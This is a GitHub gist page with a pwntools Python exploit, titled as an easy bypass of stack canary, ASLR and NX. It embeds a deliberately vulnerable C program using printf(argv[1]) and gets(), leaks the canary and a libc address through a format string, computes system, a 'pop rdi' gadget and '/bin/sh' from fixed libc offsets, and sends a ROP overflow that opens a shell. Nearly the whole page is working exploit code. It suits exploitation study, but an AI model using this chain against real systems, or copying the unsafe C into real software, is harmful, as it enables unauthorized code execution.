Skip to content

Instantly share code, notes, and snippets.

@Sinkmanu

Sinkmanu/exploit.py

Created May 24, 2018 08:11
Show Gist options
  • Save Sinkmanu/1608a876c37b46140adc18301e3e1a9e to your computer and use it in GitHub Desktop.
Save Sinkmanu/1608a876c37b46140adc18301e3e1a9e to your computer and use it in GitHub Desktop.
Download ZIP
Easy exploit to bypass canary, ASLR and NX
Raw
exploit.py
from pwn import *
'''
// File: leak.c
// gcc leak.c -o leak
#include <stdio.h>
int main(int argc, char *argv[]){
char buff[64];
printf(argv[1]);
printf("\n");
gets(buff);
return 0;
}
'''
# stack canary and __libc_start_main+240 leak - %17$p,%19$p
context(arch = 'amd64', os = 'linux')
p = process(["./leak", "%17$p,%19$p"])
#p = gdb.debug(["./leak", "%17\$p,%19\$p"], '''
#b *main
#r %17$p,%19$p
#''')
canary_libc = p.recvuntil("\x0a")
canary = p64(int(canary_libc.split(",")[0], 16))
__libc_start_main = p64(int(canary_libc.split(",")[1], 16)) # -240
libc_addr = int(canary_libc.split(",")[1], 16)-240 - 0x20740
system_addr = libc_addr + 0x45390
pop_rdi = libc_addr + 0x21102
bin_sh = libc_addr + 0x18cd57
log.success("Canary: " + canary_libc.split(",")[0])
log.success("libc addr: " + hex(libc_addr))
log.success("system addr: " + hex(system_addr))
log.success("gadget \"pop rdi, ret\": " + hex(pop_rdi))
log.success("/bin/sh addr: " + hex(bin_sh))
p.sendline("A"*72+canary+"AAAAAAAA"+p64(pop_rdi)+p64(bin_sh)+p64(system_addr))
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment